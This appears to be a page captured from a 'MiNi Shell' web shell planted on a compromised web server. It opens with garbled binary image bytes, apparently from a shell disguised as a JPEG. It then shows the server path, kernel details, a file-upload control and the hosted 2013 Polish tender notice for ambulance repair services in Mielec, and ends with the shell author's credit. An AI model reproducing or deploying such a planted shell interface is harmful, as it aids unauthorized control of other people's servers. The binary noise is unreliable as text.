JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/313536-N-2013.html

<p class="kh_header"><b>Mielec: usługi w zakresie napraw bieżących, konserwacji,  obsługi technicznej, badań technicznych oraz napraw blacharskich i lakierniczych ambulansów sanitarnych, będących w posiadaniu Powiatowej Stacji Pogotowia Ratunkowego Samodzielnego Publicznego Zakładu w Mielcu</b><br>
<b>Numer ogłoszenia: 313536 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Stacja Pogotowia Ratunkowego - Samodzielny Publiczny Zakład , ul. Żeromskiego 22, 39-300 Mielec, woj. podkarpackie, tel. 017 7800125, faks 017 7800552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie-mielec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi w zakresie napraw bieżących, konserwacji,  obsługi technicznej, badań technicznych oraz napraw blacharskich i lakierniczych ambulansów sanitarnych, będących w posiadaniu Powiatowej Stacji Pogotowia Ratunkowego Samodzielnego Publicznego Zakładu w Mielcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Zamówienie obejmuje:
a)wykonywanie okresowych przeglądów technicznych i rejestracyjnych,
b)wykonywanie napraw wynikających z przeglądów,
c)wykonywanie napraw bieżących wynikłych z awarii, 
d)wykonywanie bieżących konserwacji,
e)demontaż zużytych części, akcesoriów i materiałów wynikających z napraw oraz ich utylizacja,
f)montaż nowych części, akcesoriów użytych do naprawy,
g)dostawę niezbędnych części zamiennych, akcesoriów gumowych, materiałów, olejów i płynów eksploatacyjnych, 
h)serwis klimatyzacji oraz systemów ogrzewania ambulansu,
i)serwis instalacji, urządzeń elektronicznych i elektrycznych,
j)wykonywanie usług wynikających ze specjalistycznej budowy samochodów sanitarnych, takich jak: naklejanie oznakowania ambulansu w postaci emblematów specjalistycznych,
k)wykonywanie napraw wynikłych z wypadków, kolizji drogowych, w tym napraw blacharskich i lakierniczych.
2) Usługi winny być świadczone zgodnie z poniższymi  warunkami:
a)wykonawca zapewnia stałe (ciągłe) utrzymanie pojazdów w pełnej sprawności techniczno-użytkowej przez okres obowiązywania umowy,
b)jeżeli w toku wykonania usługi zajdzie konieczność dokonania czynności przekraczających uzgodniony zakres, Wykonawca zobowiązany jest uzgodnić go z osobą upoważnioną przez Zamawiającego, przed jego wykonaniem,
c)na wykonane usługi Wykonawca udzieli minimum 12 miesięcznej gwarancji,
d)na zakupione nowe części Wykonawca udzieli gwarancji producenta,
e)niezależnie od uprawnień z tytułu gwarancji zamawiającemu przysługuje wobec Wykonawcy roszczenie z tytułu rękojmi
f)termin wykonania usługi przeglądu technicznego nie może być dłuższy niż 24 godziny od daty przekazania pojazdu Wykonawcy, do przeglądu technicznego,
g)termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 2 dni robocze od daty przekazania pojazdu Wykonawcy, do naprawy,
h)w wyjątkowych sytuacjach, jedynie po uzgodnieniu z osobą upoważnioną przez Zamawiającego, terminy określone w podpunktach:   6 i 7 mogą ulec zmianie,
i)usługi winny być wykonywane w warsztacie, który powinien być czynny minimum 14 godzin  na dobę w dniach od  poniedziałku do piątku i minimum 6 godzin w soboty; w razie pilnej potrzeby zgłoszonej przez Zamawiającego, Wykonawca przeprowadzi diagnozę awarii ambulansu w niedzielę, w uzgodnionym przez strony terminie,
j)naprawy dokonywane będą w godzinach otwarcia zakładu w trybie pilnym (bez kolejki)
Zamawiający zastrzega sobie możliwość  napraw przy dostawie własnych części zamiennych, w przypadku użycia części zamiennych  Wykonawcy, wymagane będą  homologacje i atesty bezpieczeństwa montowanych części
Zamawiający przez części zamienne rozumie - części zamienne o tej samej jakości, co komponenty stosowane do montażu pojazdu samochodowego, produkowane zgodnie ze specyfikacją i standardami produkcyjnymi, ustalonymi przez producenta tych pojazdów do produkcji komponentów lub części zamiennych danego pojazdu samochodowego: przyjmuje się, że części są oryginalne, jeżeli producent tych części zaświadczy, że zostały one wyprodukowane zgodnie ze specyfikacjami i standardami produkcyjnymi ustalonymi przez producenta danych pojazdów i są one tej samej  jakości co części stosowane do montażu tych pojazdów oraz części zamienne, których producent zaświadczy, ze są one tej samej jakości, co komponenty, które są lub były stosowane do montażu danych pojazdów samochodowych, zgodnie z § 2 pkt. 21 oraz pkt. 22 Rozporządzenia Rady Ministrów z dnia 8 października 2010 r. w sprawie wyłączenia określonych porozumień wertykalnych w sektorze pojazdów samochodowych spoza zakazu porozumień ograniczających konkurencję (Dz.U. z 2010 r. nr 198 poz. 1315).
k)czasochłonność napraw winna być zgodna z normami czasowymi opracowanymi  przez producenta danej marki.
l)w przypadku reklamacji usługi, Wykonawca jest zobowiązany do odbioru na swój koszt  ambulansu z miejsca wskazanego przez Zamawiającego z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i wykonania naprawy w terminie nie dłuższym niż 48 godzin licząc od momentu zgłoszenia reklamacji.
m)Zamawiający zastrzega sobie prawo do kontroli podczas wykonywanej naprawy lub obsługi technicznej samochodów.
n)w celu prawidłowej realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić:
1.oprogramowanie i sprzęt do komputerowej diagnostyki i obsługi silników wysokoprężnych oraz układów elektronicznych pojazdów;
2.narzędzia specjalistyczne;
3.stanowisko naprawcze ( kanał lub podnośnik);
4.dostęp do części zamiennych z  gwarancją producenta;
5.personel techniczny posiadający kwalifikacje  do realizacji przedmiotu zamówienia.

3) Całość przedmiotu zamówienia obejmuje usługi w zakresie:   naprawy bieżące, konserwacje , obsługa techniczna, badania techniczne - PAKIET 1 oraz naprawy blacharskie i lakiernicze - PAKIET 2, niżej wymienionych samochodów użytkowanych przez Zamawiającego:
1.Mercedes- Benz Sprinter 313 CDI, RMI 12 JP - rok produkcji: 2001, przebieg w km na dzień 31.03.2013: 263 562
2.Mercedes-  Sprinter 312, RMI X112 - rok produkcji: 1999, przebieg w km na dzień 31.03.2013: 383 197
3.Mercedes Sprinter 313, RMI 12 JT- rok produkcji: 2001, przebieg w km na dzień 31.03.2013: 353 321
4.Mercedes Sprinter 319 CDI, RMI 23112 - rok produkcji: 2010, przebieg w km na dzień 31.03.2013: 79 610
5.Peugeot Boxer  2,8 HDI RMI 12 SY - rok produkcji: 2006, przebieg w km na dzień 31.03.2013: 253 747
6. Mercedes-Benz  Sprinter 316 CDI, RMI 14112 - rok produkcji: 2009, przebieg w km na dzień 31.03.2013: 148 833
7.Mercedes-Benz  Sprinter 316 CDI, RMI 15112 - rok produkcji: 2009, przebieg w km na dzień 31.03.2013: 105 992
8.Mercedes-Benz Vito 109 CDI RMI 07112 - rok produkcji: 2007, przebieg w km na dzień 31.03.2013: 298 627
9.Mercedes-Benz Sprinter 315CDIRMI 10112- rok produkcji: 2008, przebieg w km na dzień 31.03.2013: 138 693
4) Warsztat, do którego Zamawiający będzie odstawiał pojazdy celem wykonania usług przez Wykonawcę oraz z którego Zamawiający odbierał będzie pojazd, musi być zlokalizowany w odległości do 10 km od siedziby Powiatowej Stacji Pogotowia Ratunkowego Samodzielnego Publicznego Zakładu w Mielcu, ul. Żeromskiego 22..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 2A</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży  oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 2A.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(Wykonawca jest zobowiązany zapewnić:
1.oprogramowanie i sprzęt do komputerowej diagnostyki i obsługi silników wysokoprężnych oraz układów elektronicznych pojazdów;
2.narzędzia specjalistyczne;
3.stanowisko naprawcze (kanał lub podnośnik);
4.dostęp do części zamiennych z  gwarancją producenta;
5.personel techniczny posiadający kwalifikacje  do realizacji przedmiotu zamówienia.)
Celem oceny spełniania w/w warunku Wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 2A</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 2A</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony Formularz ofertowy.
2) Oświadczenie o zapoznaniu się z SIWZ i przyjęciu jej bez zastrzeżeń.
3) Pełnomocnictwo do podpisania oferty oraz składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona. Zamawiający wymaga przedłożenia oryginału pełnomocnictwa lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
Pełnomocnictwo winno wskazywać datę jego wystawienia oraz okres, na który zostało udzielone. Brak tego okresu zamawiający odczyta jako pełnomocnictwo wystawione na czas nieokreślony.
4) Wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie-mielec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWA  STACJA POGOTOWIA RATUNKOWEGO 
SAMODZIELNY PUBLICZNY ZAKŁAD 
ul. Żeromskiego 22
39-300  Mielec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2013 godzina 10:00, miejsce: POWIATOWA  STACJA POGOTOWIA RATUNKOWEGO 
SAMODZIELNY PUBLICZNY ZAKŁAD 
ul. Żeromskiego 22
39-300  Mielec
Sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com